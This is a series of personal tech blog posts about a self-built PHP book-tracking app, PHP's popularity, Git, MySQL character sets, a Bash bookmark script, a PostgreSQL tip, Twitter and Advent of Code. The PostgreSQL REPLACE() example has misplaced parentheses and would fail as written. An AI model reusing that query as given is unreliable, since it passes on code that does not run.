    The five different parts in the frontend are: ‘Search’, ‘Statistics’, ‘Currently reading’, ‘Collections’ and ‘Activity feed’. They are presented as Bootstrap cards. The frontend is just one index.php file with a layout of the cards. All cards (except ‘Search’) are dynamically filled with content expressed as a div class. The class content is generated by one JavaScript function per card, which in turn call a PHP file. And the PHP files just echo raw HTML.

    Other than the index.php file there is one search.php file to make up the frontend. This file takes care of presenting the book details, search output, log and lists views (more on that later). So, most of what can be done and seen in the frontend is handled by the search.php file.

    The frontend itself is of course nothing unique. It’s just a representation of the data. The backend is a bit more interesting!

    Database

    The frontend was the easy part. At least it was after I figured out the backend! I spent quite a bit of time thinking about the database design and what the backend would have to do. I thought the design for such a small application wouldn’t be too difficult. But I surprised myself with the number of changes I made to the design, to get it just right. And I wanted to get it right because:

    General rule of thumb: when you start with a good design, everything else that comes after will be a lot easier.

    chrome_2019-11-11_15-19-42.png (885×385)
    Self-explanatory view of the database design

    The multiple foreign-key relations between tables (on ids etc.) are not defined in the database. I choose to do this in the code and the JOIN queries.

    It’s not hard to understand the database design. And yes, the design could be a little tighter — two or three tables — but let me explain!

    Log, actions and states

    One of the main things I spent time thinking about are the actions and their respective states.

    I figured you can do one of five things with a book (actions):

    • You want a book
    • You get/buy/own the book
    • You start reading it
    • You finish reading it
    • You purge/remove/sell/give away the book

    Makes sense right? You could even call it the ‘book life cycle proces‘. With one input and one output.

    HOWEVER! Some books you already own without wanting them first. Or, you can read the same book more than once. Or, you can give a book to a friend, and buy it again for yourself. Or, you can finish reading a book, that you lent — from a friend or library — so it is not on your shelf anymore. All of these things happen. So actually the ‘life cycle’ actions are not a chronological fixed start-to-end tollgate process, it’s continuous and messy.

    Book log

    Every new action is added to the book log. In the frontend the last 25 entries to the book log are presented as the Activity feed. Every action has a timestamp when an action got logged and a date for that action. Which are two different things. So when I now add a book to my shelf that I acquired 4 years ago, the book log timestamp is now, but the date for the action is 4 years ago.

    The Activity feed

    With this log I can keep track of books even after I got rid of them (because selling/purging is just one of the action for a book). This is important because this way I don’t lose the log history of a book.

    Also I can add books to my wanted list even if I have owned them before (maybe I gave them away etc.). And I can start/finish reading the same book more than once. It doesn’t matter, because it is just a log entry.

    Now here’s the interesting thing. With all this log information I can generate four states:

    • Books I want
    • Books I own
    • Books I have read
    • Books I had

    These states are generated by specific hardcoded queries per state. They are generated on the fly by what is in the log file, and where the most recent log records prevail to decide the current status.

    And with all this:

    Foster will track the complete history per book and at all times represent all books I want, own, have read or have owned, at that specific moment in time.

    Lists

    I could have defined these actions as a list: but lists are simpler. Let me explain.

    I tend to collect and read specific genres of books, e.g. music, management and computer history books. So I tend to organize books like that. These descriptions/genres are all, of course, just lists.

    Some books can be three of these things at the same time: part biography, part computer history part management. So one book can be a member of more than one list.

    In the Foster backend I can add or delete books to and from as many lists as I like.

    Easily adding/deleting books from a list with the same dropdown menu (click for a gif)

    I can also easily create new lists. Say: a list of books that I want for my birthday, or books that are on loan, or books that are signed by the author etc. I just add one new list to my table, and the list will be instantly available in the backend and presented in the frontend.

    Collections

    In the frontend the action log states and the different lists are grouped together under the Collections card. As stated the first 4 collections are populated from the log, and a book always has a last state. The others are just lists.

    I can create or delete as many lists as I’d like, and it won’t affect the book log. This way I can organize my book collection far better than I could physically (a book can only have one spot on your physical shelf).

    Adding books with the Bol.com API

    This is where the magic happens! Bol.com — a large Dutch book retailer — has a very easy API you can use to query their book database. I use it to search and add books to my collection. With one click I can get most book details: title, ISBN (=EAN), image, description etc. And I can pull them all into my own database. Including the image, which I then copy and store locally. Like this:

    Adding a book via bol.com API (click for a gif)

    Of course I can also edit book details when necessary, or just enter a book by hand without the API. Sometimes Bol.com does not carry a book.

    Backend

    The bol.com search API is the start page of my backend. The other important backend page is an overview of all my books. Clicking on the titles brings up an edit view of a book. But most importantly I can quickly add or delete books from lists here AND add actions (started reading, finished).

    I have defined jQuery actions on the <select option> dropdown menus, which provide a popup — where I can fill in a date if necessary — and which trigger database inserts (there definitely might be some security concerns here: but the backend is not public).

    Security

    The frontend is open for everyone to see. I don’t mind sharing (my podcast list is also public), also because I always enjoy reading other peoples lists or recommendations. The backend is just one .htaccess password protected directory. In my first database design I had a user table with accounts/passwords etc. But the .htaccess file seemed like the easiest/quicker solution for now.

    Tech

    I built Foster from scratch, no Symphony/Laravel or what have you. And I am a bit annoyed surprised there is still no MS Access RAD equivalent for the web in 2019 (i.e. a all in one tool: from DB design to logic to GUI design to runtime).

    I know Django does most of the backend for you , so I briefly looked at it. But for Foster I still ended up using PHP / MariaDB / Bootstrap 4 / JavaScript / jQuery. It’s a familiar and very portable stack that you can mostly just drop and run anywhere (and most answers are on StackOverflow 🤓).

    I’ve thought about using SQLite, but I am very familiar with MySQL/MariaDB so that made more sense. Also I learned more about Bootstrap than I actually cared about, but that’s alright. And I wrote my first serious piece of JavaScript code ever (for the dropdown select actions). So that was fun.

    All in all: I spent a few days pondering the database design in the back of my mind. And 4 evenings programming front and backend. And now I am just polishing little things: which is a lot of fun!

    Further development

    Right now, I still have around 200 more books from my library to catalogue correctly — that’s why some dates are set to 0000-00-00. But here are a few possible new features I am thinking about:

    • RSS feed for the activity log? Now that I am bulk adding books the activity feed is not so relevant, but when things settle down, who knows, people might be interested. After I wrote a draft of this blog I implemented it!
    • Twitter integration? Posting the log to a dedicated Twitter feed.
    • Adding books by scanning the barcode / ISBN with your phone camera? If I can just get the ISBN I can automate bol.com API to do the rest. Might speed things up a bit (and might be useful when you run a secondhand bookstore 😉). I created an iOS shortcut that does exactly this! It scans the book barcode/ISBN/EAN and opens the Foster edit.php URL with this ISBN number and from there I can add the book by clicking ‘Add’ (all book details are available and prefilled by the Bol.com API). It’s great!
    • Storing/tracking more than books? CDs, DVDs, podcasts I listened too, movies I watched etc.
    • Multi-user? In the first database design there were multiple users that could access / add the books that were already in the database but still create their own log and lists. I think I could still add this to the current design.
    • As you can see in the database design, there is a remarks table. I haven’t used this table. A remark is a ‘blog’ (or a short self-written review) of a book, that can be presented with the book details. This is a one-to-many relationship, because you might want to make new remarks each time you reread a book. But, I currently blog about every book I read, so the remarks might be just an embedded blog link?

    Just share the source already!

    “Foster looks nice. Please share the code!” No, sorry, for several reasons.

    1. I made Foster specifically for me. So chances that it will fit your needs are slim and you would probably still need to make changes. In this post I share my reasoning, but you should definitely try to build your own thing!
    2. When Foster was almost done, I learned about prepared statements (did I mention I am not a web developer?)… so I had to redo the frontend. But I haven’t redone the backend (yet): so it’s not safe from SQL injections or other pretty bad coding standards. Open sourcing it can of course generate code improvements, but it would first make my site vulnerable.
    3. But most importantly: Building a web application to scratch your own personal itch and learning new things can be one of the most fun and rewarding experiences you will have! And I hope this blog is useful to you, in achieving that goal.
  • PHP: how did it become so popular?

    PHP empowers a gigantic part of the internet. So it is, by definition, a very popular (i.e. prevalent) language. But it also very popular (i.e. well-liked) to dislike PHP as a — serious — language.

    This could be explained as one of the side effects of that same popularity. With great exposure, comes greater scrutiny. But that would be too easy.

    Picture of probably one of the most pragmatic people on the internet ❤

    Because when discussing PHP as a serious computer programming language there are serious arguments of what PHP exactly lacks as a language. And of course a lot of these things are fuel for endless, and useless, debate. Also because even the author of PHP, Rasmus Lerdorf, would probably agree on most!

    It seems like a popular past time to debate everything that is bad about PHP. So over the years there have been several (viral) blogposts about this: here, here, here and here (which spawned this great response).

    Even with all the changes made to PHP in recent years, this is still a common sentiment regarding PHP. This is also illustrated by a recent remark from highly respected programmer Drew DeVault:

    So PHP certainly has it fair share of critique (it is no Lisp!).

    So why is it so popular?

    I certainly have NO need to add my two cents to this debate. But I am VERY interested to investigate why and how PHP — a widely criticised language — became so incredibly popular.

    But you don’t have to read this post, because Rasmus Lerdorf explains it rather well in the first part of this next video. (There is also another video of the same talk at a different location, but the slides are easier to follow in this one.)

    https://www.youtube.com/watch?v=wCZ5TJCBWMg&t=2s

    I thought the talk was very interesting and he drops some killer quotes, so I highly recommend it! For easy reference, here follow the key slides and quotes from his presentation that, in my opinion, help answer the question how PHP became so popular. Of course this may be a biased view (he is the creator) but I am open to different views.

    C API for the web

    My grand scheme was to write a C API for the web. So to abstract away all the web specific things that you needed to know to get your business logic up online.

    Rasmus Lerdorf

    This was the plan.

    Straight away Rasmus explains he never intended to design a “full-blown” real programming language, but more a templating system. And he wasn’t happy with CGI.pm (“simply writing HTML in another language”). He wanted a C API for the web, where he abstracted away all boiler plate stuff he always needed to write when making a web application. The idea being that the business logic would be written in a real language (C or C++). And PHP was the templating language to present the data. However “the web moved too fast and there weren’t enough C developers in the world”. And with this, his programming language (by request) grew.

    What is most striking about this remark, is his dedication towards the end goal: get your business logic online! This initial, pragmatic approach is something that returns time and time again in the development of PHP. With PHP being a means to an end. Just another tool. Nothing to be religious about.

    6 months

    Rasmus also explains, more than once, that even though he added features he was never under the impression that this little language would survive. In the first few years he was thoroughly convinced it would only last about six more months before something better would come along. And that something would solve the very real problems his language could already solve.

    Therefore he also states that for the first 5 to 7 years PHP was “NOT a language, it was a templating system”. But apparently that something never did and reluctantly his templating system grew into a programming language (with recursion and all that).

    LAMP wasn’t an accident

    However, for someone who was convinced his templating system would die off within six month, he was exceptionally good in making the right decisions in improving the further adoption of PHP.

    The right calls!

    mod_php is probably the most important decision from all of these. It made certain that PHP would tie in nicely with Linux, Apache en MySQL and thus create one of the most powerful (free) software stacks ever. Rasmus is very clear on why he thought it was necessary to become an integral part of this ecosystem. Say what you will, but he definitely made the right call here.

    mod_perl was too late to the game. And too complex and expensive (you needed a single box in a time when VMs where not a thing) when it did arrive. Python (the other P) had a different focus and things like Django were many years in the future. But there are more choices Rasmus made that worked, and that the early web clearly needed:

    More right calls.

    Speed and efficiency

    PHP is amazingly good at running crap code.

    Rasmus Lerdorf

    Anybody with a good idea, could put their idea online and this has made the web a much much better place.

    Rasmus Lerdorf

    PHP is probably the most pragmatic language ever. A kind of pragmatism that lowers the barrier to entry. Which creates one of the main points of criticism. Because it makes for bad programmers. Programmers that dont really know what they’re doing because PHP does all the work for them. You can discuss this all your can, but one thing is clear: Rasmus knows who uses his language and makes certain to lower as many barriers as he can.

    Critique

    Rasmus is of course a very intelligent guy, he knows all this. He also explains some of the reasons of strange language design decisions he made. Some have a good explanation, others he fully admits he made the wrong decision. Admirably his ego is also subjected to pragmatism.

    Some decisions are up for debate.

    Pragmatic Hypertext Preprocessor

    PHP is a tool. PHP is not important, what you do with it is important.

    Rasmus Lerdorf

    Arguing about the color of the hammer used to built that thing is just moronic. We can’t lose track of what we’re doing here why we’re programming. We’re programming to solve a problem and hopefully it’s a problem that actually matters.

    Rasmus Lerdorf

    PHP is not going away. Why? Because some of the things that PHP solves, are not yet solved by any other language (don’t add me). I am comp-sci graduate, and even though I program very little and I have probably written more code in PHP code than any other language. I am not building big important business applications, most of the time I just want something online (from a database) and I want it fast! And PHP is my hammer. Time and time again I try to look at other things. And I get it. There is serious critique. But if you want to change that, you can! Nobody is stopping you. So stop complaining and get to it. Even though I don’t share the otherwise harsh tone of this post I do share that building something compelling is up for grabs!

    And when someone finally does that, then maybe Rasmus — after 25 years — will finally get his wish. It just took a little bit longer than six months.

  • Popular post postmortem

    Yesterday I wrote a story about how Git is eating the world. And in less than 24 hours more than 10.000 people visited this article! This is not the normal kind of traffic for this site. So that calls for its own article.

    As you can see, there is a slight uptake the last day.

    Not only did the above WordPress plugin tell me I hit 10.000, but my server logs said the same.

    grep git-is-eating-the-world j11g-access.log|awk '{print $1}'|sort -u|wc -l

    I run this WordPress installation on my own VPS. Which, by the way, could handle the load just fine! (PHP 7.3 is great.)

    1 core/2GB VPS with Apache + PHP 7.3

    How?

    I usually write about things that interest me: but those things may not always be of interest to the general public. But in this case I tried to make a conscious effort to write about something topical and a little bit controversial (BitBucket dropping Mercurial support). I also picked a catchy title: a play on Marc Andreessens’ famous quote. And I deliberately tried to push the article. I.e. this is how most content creators do it. But I usually put stuff out there, and see where it lands. I mainly enjoy writing for the sake of writing. My most visited article was a Django tutorial which generated 3000 visits this year (all from generic Google searches). So I thought I could try to give promotion a little bit more effort. This idea came after reading about a Dutch blogger who was a bit obsessed with getting clicks. Which to me is (still) not the best reason to write, but of course I can see why he was obsessed with it. When you write something, it’s more fun when people actually read it!

    Submitting it

    So after writing I picked lobste.rs and Hacker News to submit my story to. I submit links very frequently to both sites, just not my own content. But this content seemed right for these sites.

    On Hacker News it sadly went nowhere. This sometimes happens. Timing is everything. I have often also submitted something there that went nowhere, but that same link would be on the front page the next day via a new submission from someone else. My submission did however generate 234 unique visits. Which normally would be a good day for my site.

    Six upvotes. Not enough for the front page.

    Lobste.rs however, is a different story. Since submitting it there, it quickly shot up to the number one position. And currently (at time of writing) it was still number one. Also, lobste.rs had the most relevant discussion and comments of all aggregators.

    I ❤ the lobste.rs community🦞

    Uh?!

    After this I also tried submitting my link to Reddit. But much to my surprise someone beat me to it!? He (or she) submitted my post to two subreddits. I don’t know how the submitter found my post. But anyway, in r/programming it received exactly zero upvotes but it did generate 5 comments? But in r/coding it was the number one post for almost the entire day!

    This specific subreddit has 168000 readers and around 1000 active users at any given moment. So even if it only received 83 upvotes, this did generate the bulk of my traffic.

    Timing is everything

    After this, things got shared (organically?) on Twitter, and other tech sites (like Codeproject) also picked it up. People also seemed to share the link by e-mail: 175 unique clicks came from Gmail and 32 from Yahoo! Mail. Which I think is quite a lot!

    I also cross post every WordPress article to Medium: these readers don’t come to my site, but they are of course able to read my content. However, the reach there was very low.

    Lessons?

    Stating the very obvious here, but it helps to pick a topical subject and then trying to push it on news aggregators. Also (obvious) it struck me how difficult it was to get a foot in the door — those first few upvotes. After that it gets easier, because you become more visible.

    These are all obvious. But the most fun was actually discovering that the thing that you wrote took on a life of its own. And people you don’t know are sharing, reading and discussing it without your interference. I just love that. I still think that that is part of the magical aspect of the internet. People I have never met who live on the other side of the planet can instantly read and discuss what I’ve written. The internet gives everyone a voice and I love it.

  • Git is eating the world

    The inception of Git (2005) is more or less the halfway point between the inception of Linux (1991) and today (2019). A lot has happened since. One thing is clear however: software is eating the world and Git is the fork with which it is being eaten. (Yes, pun intended).

    Linux and Git

    In 2005, as far as Linus Torvalds’ legacy was concerned, he didn’t need to worry. His pet project Linux — “won’t be big and professional” — was well on its way to dominating the server and supercomputer market. And with the arrival of Linux powered Android smartphones this usage would even be eclipsed a few years later. Linux was also already a full-blown day job for many developers and the biggest distributed software project in the world.

    However, with the creation of Git in 2005, Linus Torvalds can stake the claim that he is responsible for not one, but two of the most important software revolutions ever. Both projects grew out of a personal itch, with the latter being needed for the other. The story of both inceptions are of course very well documented in the annals of internet history i.e. mailinglist archives. (Side note: one of Git’s most impressive feats was at the very early beginning, when Torvalds was able to get Git self-hosted within a matter of days 🤯).

    Today

    Fast forward to today and Git is everywhere. It has become the de facto distributed versioning control system (DVCS). However, it was of course not the first DVCS and may not even be the best i.e. most suitable for some use cases.

    The Linux project using Git is of course the biggest confirmation of Git’s powerful qualities. Because no other open source projects are bigger than Linux. So if it’s good enough for Linux it sure should be good enough for all other projects. Right?

    However Git is also notorious for being the perfect tool to shoot yourself in the foot with. It demands a different way of thinking. And things can quickly go wrong if you’re not completely comfortable with what you’re doing.

    Web-based DVCS

    Part of these problems were solved by GitHub. Which gave the ideas of Git and distributed software collaboration a web interface and made it social (follow developers, star projects etc.). It was the right timing and in an increasingly interconnected world distributed version control seemed like the only way to go. This left classic client-server version control systems like CVS and SVN in the dust (though some large projects are still developed using these models e.g. OpenBSD uses CVS).

    GitHub helped popularize Git itself. And legions of young developers grew up using GitHub and therefore Git. And yet, the world was still hungry for more. This was proven by the arrival of GitLab, initially envisioned as as SaaS Git service, most GitLab revenue now comes from self-hosted installations with premium features.

    But of course GitHub wasn’t the only web-based version control system. BitBucket started around the same time and offered not only Git support but also Mercurial support. And even in 2019 new web-based software development platforms (using Git) are born: i.e. sourcehut.

    Too late?

    However the fast adoption of tools like GitHub had already left other distributed version control systems behind in popularity: systems like Fossil, Bazaar and Mercurial and many others. Even though some of these systems on a certain level might be better suited for most projects. The relative simplicity of Fossil does a lot of things right. And a lot of people seem to agree Mercurial is the more intuitive DVCS.

    BitKeeper was also too late to realize that they had lost the war, when they open-sourced their software in 2016. Remember: BitKeeper being proprietary was one of the main reasons Git was born initially.

    Yesterday BitBucket announced they would sunset their Mercurial support. Effectively giving almost nothing short of a deathblow to Mercurial, as BitBucket was one of the largest promoters of Mercurial. This set off quite a few discussions around the internet. Partly because of how they plan to sunset their support. But partly also because Mercurial seems to have a lot of sentimental support — the argument being that it is the saner and more intuitive DVCS. Which is surprising because, as stated by BitBucket; over 90% of their users use Git. So there is a clear winner. Still the idea of a winner-takes-all does not sit well with some developers. Which is probably a good thing.

    Future?

    Right now Git is the clear winner, there is no denying that. Git is everywhere, and for many IDEs/workflow/collaboration software it is the default choice for a DVCS. But things are never static, especially in the world of software. So I am curious to see where we’ll be in another 14 years!

  • Gid – Get it done!

    Last weekend I built a personal ToDo app. Partly as an excuse to mess around a bit with all this ‘new and hip’ Web 2.0 technology (jQuery and Bootstrap) 🙈

    But mostly because I needed one, and I couldn’t find a decent one.

    Yes, I designed the icon myself. Can you tell?

    Decent?

    Decent in my opinion would be:

    1. Self hosted
    2. Self contained
    3. Use a plain text file
    4. Mobile friendly
    5. Able to track / see DONE items

    And Gid does just that (and nothing more).

    1. Any PHP enabled webserver will do.
    2. No need for third party tools, everything you need is right here (Bootstrap and jQuery are included).
    3. No database setup or connection is necessary. Gid writes to plain text files that can be moved and edited by hand if needed (like todotxt.org).
    4. Works and looks decent on a smartphone.
    5. The DONE items are still visible with a strike through.

    I had fun, learned quite a few new things (web development is not my day job) and me and my wife now share our grocery list with this app!

    The biggest headache was getting iOS to consistently and correctly handle input form submit events. Being a touch device, this is somehow still a thing in 2019. Thanks Stack Overflow! Anyway, this is what it looks like on my iPhone.

    Web development

    This was mainly an interesting exercise to try to understand how PHP, Javascript/jQuery and Bootstrap work together on a rather basic level and how with Ajax you are able to manipulate the DOM. I deliberately used an older tech stack, thinking a lot of problems would be solved, however (as explained) some things still seem to be a thing. Also, what I was trying to do is just very, very basic and still I feel somehow this should be way easier! There are a lot of different technologies involved that each have their own specifics and that all have to work together.

    Code is on Github: do as you please.

    (P.S. Yes, the name. I know.)

  • Create a Chrome bookmark html file to import list of URLs

    I recently switched RSS providers and I could only extract my saved posts as a list of URLs. So I thought I’d add these to a bookmark folder in Chrome. However, Chrome bookmark import only accepts a specifically formatted .html file.

    So if you have a file with all your urls, name this file ‘url.txt’ and run this script to create a .html file that you can import in Chrome (hat-tip to GeoffreyPlitt).

    #!/bin/bash
    #
    # Run this script on a file named urls.txt with all your URLs and pipe the output to an HTML file.
    # Example: ./convert_url_file.sh > bookmarks.html
    
    echo "<!DOCTYPE NETSCAPE-Bookmark-file-1>"
    echo '<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">'
    echo '<TITLE>Bookmarks</TITLE>'
    echo '<H1>Bookmarks</H1>'
    echo '<DL><p>'
      cat urls.txt |
      while read L; do
        echo -n '    <DT><A HREF="';
            echo ''"$L"'">'"$L"'</A>';
      done
    echo "</DL><p>"
  • About WordPress, emojis, MySQL and latin1, utf8 and utf8mb4 character sets

    PSA: the MySQL utf8 character set is not real Unicode utf8. Instead use utf8mb4.

    So you landed here because some parts of your website are garbled. And this happened after a server or website migration. You exported your database and imported this export or dump on the new server. And now your posts look like this:

    Strange characters!

    When they should look like this:

    Emojis!

    These are screenshots from this website. This website was an old WordPress installation that still used the latin1 character set. The WordPress installation was up to date, but automatic WordPress updates will never update or change the database character set. So this will always remain what it was on initial installation (which was latin1 in my case).

    And latin1 can not store (real) Unicode characters e.g. emojis. You need a Unicode character set. So, just use utf8, right?

    Problem 1: exporting and importing the database with the wrong character set

    When exporting/dumping a database with mysqldump, this will use the default MySQL servers’ character set (set in my.cnf). In my case this was set to utf8. But by not explicitly telling the mysqldump to use the correct character set for a particular database (which was latin1) my dumped data was messed up.

    So when I restored the dump (on the new server) some text was garbled and emojis had completely disappeared from blog posts.

    I fixed this with help of these links. Key here is: explicitly set the correct character for a database when exporting this database. Then: change all instances in the dump file from the old character set to the new character set and import this file.

    https://theblogpress.com/blog/seeing-weird-characters-on-blog-how-to-fix-wordpress-character-encoding-latin1-to-utf8/

    Problem 2: some emojis work, some don’t

    After this my text was fine. I exported using the old character set and imported using utf8, what could go wrong! But some emojis were still missing, but others were not?! This was a head-scratcher.

    There is a question mark instead of an emoji

    How can this be, I had set my database character set to utf8 (with utf8_general_ci collation). This is Unicode, right? Wrong!

    MySQL utf8 does not support complete Unicode. MySQL utf8 uses only 3 bytes per character.

    Full Unicode support needs 4 bytes per character. So your MySQL installation needs to use the utf8mb4 character set (and utf8mb4_unicode_ci collation) to have real and full Unicode support.

    Some strange decisions were made in the 2002. 🤯 Which has given a lot of people headaches.

    So, MySQL utf8 only uses three bytes per character, but the explanation for the image with the one missing emoji is, that *some* emojis (like the❤️) will be expressed correctly with only three bytes.

    Problem 3: but I used emojis before, in my latin1 WordPress installation?!

    Yes, things worked fine, right? And here is the thing: if you dumped your database with the correct (old) character set and imported correctly with this old character set, things would still work!

    But you said latin1 does not support (4 byte character) emojis!?

    Correct!

    However WordPress is smart enough to figure this out: when using emojis in post titles or posts it will check the database character set and change the emoji to (hexadecimal) HTML code — which can be expressed and stored just fine in latin1.

    But how do you explain this image? This was after incorrectly dumping and importing a database.

    Wait, what?! The URL has the correct emoji but the post title does not!?!

    The post URL has two emojis, but one emoji is missing from the title?! I already explained why the emoji is missing from the post title, so how can that emoji be present in the post URL? This is because WordPress stores the post titles differently from the URLs.

    How the title and the post name (url) are stored

    So the post title field stores real Unicode symbols and the post_name (URL) field stores them encoded. So there you have it 🤓!

  • Use PostgreSQL REPLACE() to replace dots with commas (dollar to euro)

    If you have set up your database tables correctly you might be using double-precision floating numbers to store currency values. This works great because dollars use dots to represent decimals.

    The problem starts when it’s not actually dollars you are storing but euros, and maybe you need to copy query output to Excel or LibreOffice Calc to work with these Euro values.

    Both of these spreadsheet programs don’t know how to correctly handle the dots or how to correctly import them– at least without some tricks. There are different ways to deal with this, but this is all after you copied the data over to your spreadsheet. Find and replace is a common one.

    But I like to start at the source. (Yes, you can change your system locale and all that, but I would advise against that for other reasons).

    So assuming this is a query you would like to run regularly, instead of running this (which will give you the dotted price):

    SELECT product, 
    price as price_with_dot
    FROM products

    You can use REPLACE(), to replace the dot with commas and cast the double-precision float to text.

    SELECT product, 
    REPLACE(ROUND(price),2)::text, '.', ',') as "price_with_comma"
    FROM products

    For good measure, I also use ROUND() to round to two decimals.

  • Ten years on Twitter 🔟❤️

    Today marks my ten year anniversary on Twitter! There are few other web services I have been using for ten years. Sure, I have been e-mailing and blogging for longer, but those are activities — like browsing — and not specifically tied to one service (e.g. Gmail is just one of many mail services). And after ten years, Twitter is still a valuable and fun addition to life online. But it takes a bit of work to keep it fun and interesting.

    TL;DR

    • Twitter is your Bonsai tree: cut and trim.
    • Use the Search tab, it’s awesome!
    • Stay away from political discussions.
    • Be nice! No snark.
    • Bookmark all the things.

    Twitter, the protocol

    Twitter, of course, provides short synchronous one-to-all updates. In comparison; mail and blogging are asynchronous. Their feedback loop is different and they’re less instant. And WhatsApp or messaging are forms of one-to-many communication and they’re not public (so not one-to-all). So Twitter takes a unique place among these communication options.

    Effectively the service Twitter provides is it’s own thing. Because Twitter is more a protocol, or an internet utility if you like. And more often than not, protocols or utilities tend to get used in ways they weren’t supposed to. I’ve written about Twitter many times before. And I love blogging and RSS but Twitter for me is still the place for near real-time updates. This post is part celebration of Twitter and part tips how I, personally, use this protocol to keep it fun and interesting.

    Bonsai

    Twitter can be many things to many people. For some people it can be the number one place to get their news on politics. For others Twitter is all about comedy (Twitter comedy is certainly a fun place!) or sports (I do follow quite a bit of NBA news). And some people just jump in, enjoy the moment, not caring about what came before and logging off again. And that is fine, but that is just not how I roll. When I follow you, I care about what you have to say, so I make an effort to read it.

    So I am careful about following people that tweet very often. When I check out a profile page, and see a user with 45,978 updates, that’s usually an indication that I will not follow that account. But, this is me. I see my Twitter timeline like a bonsai tree, cutting and trimming is an integral part of keeping things manageable. Because when you’re not careful, Twitter can become overwhelming. Certainly when you’re a strict chronological timeline user, like I am. But, sparingly following accounts can make you miss out on great stuff, right?

    Search tab

    My solution to this problem is the Search tab (available on the app and mobile). Because this tab is actually pretty good! Twitter knows my interests based on a cross-section of accounts I follow, and in this tab it makes a nice selection of tweets that I need to see. It is my second home, my second timeline. Usually I catch up on interesting things of otherwise loud Twitter accounts (i.e. lots of tech accounts that I don’t follow). So Twitter helps me to point out things that I still would like to see. I get the best of both worlds. It’s great!

    Politics

    There are few subjects as flammable as politics on Twitter. So I try to stay away from politics and try not to get involved in political discussions. That doesn’t mean I am not aware of things going on, or that I am not interested in politics. Quite the opposite! I just don’t think Twitter is the best place for political debate. The new 280 character limit was an improvement, but it’s still too short for real discussions or nuance (maybe this is true for the internet as a whole). Sure, certain threads can provide insight, and some people really know what they’re talking about. But I will think twice before personally entering a discussion. I do follow quite a bit of blogs/sites on politics and Twitter helps me to point to those things. These places usually help me more in understanding things that are otherwise hard to express in 280 characters.

    Be positive

    It is very easy to be dismissive or negative on Twitter. But very little good comes from that. So I always try to add something positive. I recently came across this tweet, and I think this sums it up rather well:

    Pointer

    Like stated Twitter can be many things to many people. But from day one, for me it has always been a place to point and get pointed to interesting things. The best Twitter for me is Twitter as a jump-off zone. My love for Twitter comes from the experience of being pointed to great books, movies, blogs, (music) videos and podcasts. And I am a heavy user of the bookmark option. (I tend to like very little on Twitter, which is more of a thank you nowadays.) But I bookmark all the things. Usually I scan and read my timeline on mobile, bookmark the interesting things and come back to it later in the day on a PC.

    What’s next?

    I had been blogging for a few years when Twitter came along. So I have never been able to shake the feeling of seeing Twitter as a micro blog for everyone. (Which is just one of its uses.) I am also aware of concepts like micro.blog, matrix.org or Mastodon. Services that, at the very least, have been inspired by Twitter, and build further on the idea of a communication protocol. But the thing is, Twitter was first, and Twitter is where everybody is. It’s part of the plumbing of the internet now, I don’t see it going away soon and that is all right by me! Cheers!

  • Can we replace paper?

    Paper always beats rock and scissors. Because one of the few inventions greater than writing itself, is writing on paper. Paper writings are absolute, self-contained and transferable units of knowledge, which after publishing become and stay available and accessible for hundreds of years or more.

    Don’t take my word for it, there is this great quote by J.C.R. Licklider found in Libraries of the Future and brought to my attention by Walter Isaacson in The Innovators.

    Message and medium

    Take da Vinci’s work. We are able to witness and experience and read the exact paper he put his thoughts on some 500 years ago. Our language may have changed but the medium and therefore message survived. You can pick it up, look at it, and see exactly what he saw (if you can afford it).

    And in the same vein, I can easily pick up a book, written and printed 100 years ago, and read it. Or nearer by, I can open any textbook I used in college from my bookshelf and read it. And my class notes just sit in a box, unchanged, ready to be read. All I need are my eyeballs. But my 3.5 inch floppies from that era, I can no longer access those (with ease). And the CD-ROMs, I wonder if they would even work. And when the medium becomes inaccessible the message is lost.

    Part of my bookshelf

    The internet

    So as I am typing this on an electronic digital device, that translates key presses into binary numbers which are stored on a solid state disk on another computer somewhere else, which is connected with my device through countless other specialised electronic devices and protocols, I can’t help but wonder about what will be left in 100 years — or more — from what is written everyday on the internet.

    The internet is right up there with the written word as one of our greatest inventions, but it is much more fragile and dependant on many layers (i.e. electricity, storage, network, specialised devices, formats) that all interact with one another.

    We have accumulated large parts of human knowledge in millions of paper books over the past millennium, but most written text nowadays is digital. And digital formats and transfer methods change. Fast and often. So I wonder how we can best preserve our written thoughts for the next millennium: self-contained and transferable. But I can’t come up with anything better than paper?

  • Advent of Code

    Advent of Code is a yearly programming contest created by Eric Wastl and it is currently being held at adventofcode.com. That means that this site spawns two daily programming challenges — until Christmas — to see who can solve them the fastest. But it is not just about being fast, Advent of Code is also a great way to improve your programming skills with daily puzzles or learn a new language. Because everyone gets the same daily puzzles it is also a great way to share and discuss results, and above all, learn.

    Though I knew of Advent of Code, I hadn’t participated before, but it seems two days, and four puzzles later, I am sort of in. Or at least, after only two days I am already fascinated by what I have seen, so I thought I’d share!

    Fascinating findings

    • Python seems to be the most popular language, by far. At least judging by Github repo names, which is of course not an exact measure, but it is more or less an indicator, as a lot of people tend to share their solutions there. Python is the most popular language, and it isn’t even close:
    • Browsing through the code, it — once again — becomes apparent that even with the exact same tools (e.g. Python) we all bring different experiences and education to the table which results in a colorful variation of solutions for the exact same puzzles. I’ve seen 100+ lines of Python code generate the exact same result as 10 lines. Advent of Code emphasizes that we are all unique individuals, and there is not a specific right way, just as long as you get there.
    • If I had to guess, I would have picked JavaScript to be the most popular language. But as you can see it only comes in second. Ruby, Go and C# are also unsurprising entries on this list, but Haskell and Elixir are — to me at least. These two functional languages seem to have quite a bit of buzz around them and people passionately seem to pick these languages as their language of choice, which is interesting as I know very little about either. Fun side note: even the creator of Elixir participates in AoC! 
    • Very few people seem to pick PHP. Which I also find surprising, because gigantic parts of the web run PHP. But PHP seems to have little appeal when it comes to coding challenges?
    • Some people are fast, I mean really fast! Just look at the times on the leader board. Judging from these times, this means some people are able to read around 1000 words explaining a puzzle, and then coding up not one, but two solutions and submitting the correct answer in under four minutes!  I kid you not. This next person live-streamed it, and clocks in around 5 minutes (even without using the command-line shortcuts like CTRL-R), and — here’s the kicker — it didn’t even put him in the top 20 for that day!
    • Of course you can use any language you like or even pen and paper, it is a puzzle after all. And people use some really crazy stuff, I love it! Anything goes, even Excel, and I think that is one of the goals of AoC: try to learn new things! There is one person who deliberately tried a new language for each challenge.

    Notable entries

    So it’s not all about speed, it’s also about trying new things. Here are some other unexpected examples.

    • Minecraft: This one takes the cake for me. See if you can wrap your head around what is happening here:

    Personal learnings so far

